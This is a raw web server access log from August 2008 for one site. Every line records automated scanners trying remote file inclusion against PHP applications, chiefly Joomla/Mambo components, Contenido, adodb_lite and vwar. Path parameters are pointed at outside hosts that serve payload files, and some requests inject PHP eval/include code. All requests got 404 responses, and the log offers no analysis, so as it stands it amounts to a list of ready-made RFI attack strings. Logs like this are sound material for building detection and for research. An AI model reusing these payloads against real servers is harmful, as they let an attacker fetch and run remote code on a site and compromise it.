202.47.247.140 - - [27/Aug/2008:02:12:20 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sajt.ba/test/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:02:12:35 -0700] "GET /netcat/htmledit//index.php?DOCUMENT_ROOT=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:02:12:35 -0700] "GET /netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:14:01 -0700] "GET /logs/access_080724.log//index.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:16:05 -0700] "GET /logs/access.log/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:16:10 -0700] "GET /logs/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
208.75.225.10 - - [27/Aug/2008:02:17:44 -0700] "GET /netcat/htmledit//join.php?DOCUMENT_ROOT=http://acc-advertising.com/img/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.danjtams.com"
208.75.225.10 - - [27/Aug/2008:02:17:44 -0700] "GET /logs/netcat/htmledit//join.php?DOCUMENT_ROOT=http://acc-advertising.com/img/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:02:22:39 -0700] "GET /logs/access.log/netcat/htmledit//index.php?DOCUMENT_ROOT=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:02:22:39 -0700] "GET /logs/access.log/netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:02:22:40 -0700] "GET /netcat/htmledit//index.php?DOCUMENT_ROOT=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:02:22:40 -0700] "GET /netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:02:22:40 -0700] "GET /logs/netcat/htmledit//index.php?DOCUMENT_ROOT=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:02:22:40 -0700] "GET /logs/netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
205.234.186.117 - - [27/Aug/2008:02:23:47 -0700] "GET /logs/access.log//citywriter/head.php?path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
205.234.186.117 - - [27/Aug/2008:02:23:47 -0700] "GET //citywriter/head.php?path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
205.234.186.117 - - [27/Aug/2008:02:23:47 -0700] "GET /logs//citywriter/head.php?path=http://scaneru.nm.ru/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:27:06 -0700] "GET /logs/access_080724.log//index.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:27:07 -0700] "GET /logs/access.log/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:27:07 -0700] "GET /errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:27:08 -0700] "GET //index.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:27:08 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:27:11 -0700] "GET /logs/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:27:42 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:27:49 -0700] "GET /logs/scripts.log//admin/classes/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:28:57 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:29:06 -0700] "GET /logs/phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:29:06 -0700] "GET /phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:29:35 -0700] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:29:39 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:02:30:14 -0700] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:02:30:19 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:02:30:23 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:31:32 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:31:33 -0700] "GET /phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:31:33 -0700] "GET /logs/phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:02:31:38 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://moop.moomoo.co.il/sdsdf.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
212.227.65.79 - - [27/Aug/2008:02:31:38 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.fsj-sh.de//images/stories/desmodos.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:31:43 -0700] "GET /logs/access_080722.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:31:49 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
83.223.100.182 - - [27/Aug/2008:02:32:03 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:33:07 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:33:07 -0700] "GET //include/admin.lib.inc.php?site_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:33:07 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:33:55 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:33:56 -0700] "GET //include/admin.lib.inc.php?site_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:33:56 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:36:23 -0700] "GET /logs/access.log//admin/classes/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:36:32 -0700] "GET /logs//admin/classes/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:36:45 -0700] "GET //admin/classes/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
65.254.49.34 - - [27/Aug/2008:02:36:58 -0700] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://vcd.co.uk/uploadfiles/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.danjtams.com"
65.254.49.34 - - [27/Aug/2008:02:37:01 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://vcd.co.uk/uploadfiles/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.danjtams.com"
83.223.100.182 - - [27/Aug/2008:02:37:33 -0700] "GET /logs/access_080722.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
83.223.100.182 - - [27/Aug/2008:02:37:33 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
83.223.100.182 - - [27/Aug/2008:02:37:33 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
204.214.80.199 - - [27/Aug/2008:02:38:37 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
204.214.80.199 - - [27/Aug/2008:02:38:37 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
204.214.80.199 - - [27/Aug/2008:02:38:38 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
83.223.100.182 - - [27/Aug/2008:02:40:33 -0700] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
83.223.100.182 - - [27/Aug/2008:02:40:33 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
83.223.100.182 - - [27/Aug/2008:02:40:34 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
80.93.56.80 - - [27/Aug/2008:02:41:37 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:42:29 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:42:33 -0700] "GET /phphtml.php?htmlclass_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
217.128.122.28 - - [27/Aug/2008:02:43:07 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
217.128.122.28 - - [27/Aug/2008:02:43:07 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
217.128.122.28 - - [27/Aug/2008:02:43:07 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
217.128.122.28 - - [27/Aug/2008:02:43:07 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
217.128.122.28 - - [27/Aug/2008:02:43:07 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
217.128.122.28 - - [27/Aug/2008:02:43:08 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:02:43:18 -0700] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:02:43:22 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
201.17.129.24 - - [27/Aug/2008:02:43:28 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://desterrr.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:43:42 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:43:43 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:43:43 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:43:43 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:43:43 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:43:43 -0700] "GET /logs/access.log/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:43:43 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:43:43 -0700] "GET /errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:43:44 -0700] "GET /logs/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:43:59 -0700] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:44:02 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:44:06 -0700] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:44:30 -0700] "GET /logs/access.log/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:44:30 -0700] "GET /errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
85.234.212.3 - - [27/Aug/2008:02:44:31 -0700] "GET /logs/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
84.54.137.9 - - [27/Aug/2008:02:46:25 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
212.241.212.236 - - [27/Aug/2008:02:46:29 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
212.241.212.236 - - [27/Aug/2008:02:46:29 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
212.241.212.236 - - [27/Aug/2008:02:46:29 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:46:56 -0700] "GET /logs/access_080722.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:46:59 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:47:03 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:47:12 -0700] "GET /logs/access.log//convert/mvcw.php?step=1&vwar_root=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:47:13 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:47:16 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:47:23 -0700] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
65.254.58.42 - - [27/Aug/2008:02:47:26 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.posmac.nl/templates/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:47:30 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:47:30 -0700] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:47:49 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:47:55 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:47:58 -0700] "GET //include/admin.lib.inc.php?site_path=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
83.223.100.182 - - [27/Aug/2008:02:48:29 -0700] "GET /logs/access_080722.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:49:01 -0700] "GET /logs/access_080722.log/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:49:01 -0700] "GET /errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
64.185.237.191 - - [27/Aug/2008:02:49:02 -0700] "GET /logs/errors.php?error=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
204.214.80.199 - - [27/Aug/2008:02:50:05 -0700] "GET ///vwar/backup/errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
204.214.80.199 - - [27/Aug/2008:02:50:05 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
204.214.80.199 - - [27/Aug/2008:02:50:05 -0700] "GET /logs///vwar/backup/errors.php?error=http://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
213.252.17.105 - - [27/Aug/2008:02:51:26 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.webpage.vivamallorca.com//cache/fast.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:51:37 -0700] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
195.15.2.85 - - [27/Aug/2008:02:51:37 -0700] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://asc01.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
